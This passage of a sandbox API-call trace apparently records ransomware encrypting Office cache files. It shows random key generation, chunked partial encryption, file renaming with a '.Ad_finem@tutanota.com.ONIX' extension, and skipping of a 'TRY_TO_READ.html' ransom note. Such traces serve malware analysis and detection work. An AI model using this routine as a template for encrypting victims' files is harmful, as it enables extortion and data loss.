users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0118.652] GetProcessHeap () returned 0x410000 [0118.652] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0118.652] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0118.652] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0118.652] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473118 | out: hHeap=0x410000) returned 1 [0118.652] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0118.652] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0118.652] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0118.652] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0118.652] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0118.652] GetLastError () returned 0x0 [0118.652] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0118.653] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0118.653] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x150578, nNumberOfBytesToLockHigh=0x0) returned 1 [0118.653] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.653] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0118.655] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.655] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.655] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0118.655] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0118.655] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1 [0118.656] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73 [0118.656] GetProcessHeap () returned 0x410000 [0118.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x4d6b80 [0118.656] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" [0118.656] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0118.656] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1377656) returned 1 [0118.656] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x150578 [0118.656] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0118.656] GetProcessHeap () returned 0x410000 [0118.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0118.656] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0118.656] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0118.658] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0118.659] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.660] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x150578) returned 0x2b30020 [0118.660] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x150578) returned 0x3680020 [0118.660] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.660] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x150578, lpOverlapped=0x0) returned 1 [0118.750] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x150578, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0118.750] CloseHandle (hObject=0x498) returned 1 [0118.753] GetProcessHeap () returned 0x410000 [0118.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0118.753] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0118.755] GetProcessHeap () returned 0x410000 [0118.755] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0118.755] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0118.755] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0118.755] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0118.755] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0118.755] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0118.755] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0118.755] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0118.755] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0118.755] GetLastError () returned 0x0 [0118.755] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0118.756] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0118.756] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5061, nNumberOfBytesToLockHigh=0x0) returned 1 [0118.756] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.756] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0118.758] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.758] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.758] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0118.758] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0118.758] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0118.758] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0118.758] GetProcessHeap () returned 0x410000 [0118.758] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x4d6b80 [0118.758] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" [0118.758] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0118.758] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=20577) returned 1 [0118.758] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5061 [0118.758] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0118.758] GetProcessHeap () returned 0x410000 [0118.758] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0118.758] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0118.758] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0118.760] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0118.761] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.762] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5061) returned 0x4d8b68 [0118.762] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5061) returned 0x4ddbd8 [0118.762] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.762] ReadFile (in: hFile=0x498, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x5061, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x5061, lpOverlapped=0x0) returned 1 [0118.766] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5061, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0118.766] CloseHandle (hObject=0x498) returned 1 [0118.766] GetProcessHeap () returned 0x410000 [0118.767] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0118.767] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0118.768] GetProcessHeap () returned 0x410000 [0118.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0118.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0118.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0118.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0118.769] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c8e650, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c8e650, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c8e650, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0118.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0118.769] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0118.769] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0118.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0118.769] GetLastError () returned 0x0 [0118.769] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0118.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0118.769] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0118.769] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0118.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0118.769] GetLastError () returned 0x0 [0118.769] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0118.770] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0118.770] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xb9fa2f7, nNumberOfBytesToLockHigh=0x0) returned 1 [0118.770] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.770] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0118.774] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.774] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.775] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0118.775] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0118.775] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", dwFileAttributes=0x80) returned 1 [0118.775] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 76 [0118.775] GetProcessHeap () returned 0x410000 [0118.775] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x4d6b80 [0118.775] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" [0118.775] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0118.775] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=195011319) returned 1 [0118.775] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xb9fa2f7 [0118.775] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0118.775] GetProcessHeap () returned 0x410000 [0118.775] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0118.775] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0118.775] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0118.779] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0118.780] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.781] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x2b30020 [0118.781] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x3680020 [0118.782] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.782] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.824] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.824] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.826] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.826] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.837] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0118.837] WriteFile (in: hFile=0x498, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.843] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.843] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.844] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.845] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.855] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0118.855] WriteFile (in: hFile=0x498, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.885] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.885] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.886] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.886] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.896] SetFilePointer (in: hFile=0x498, 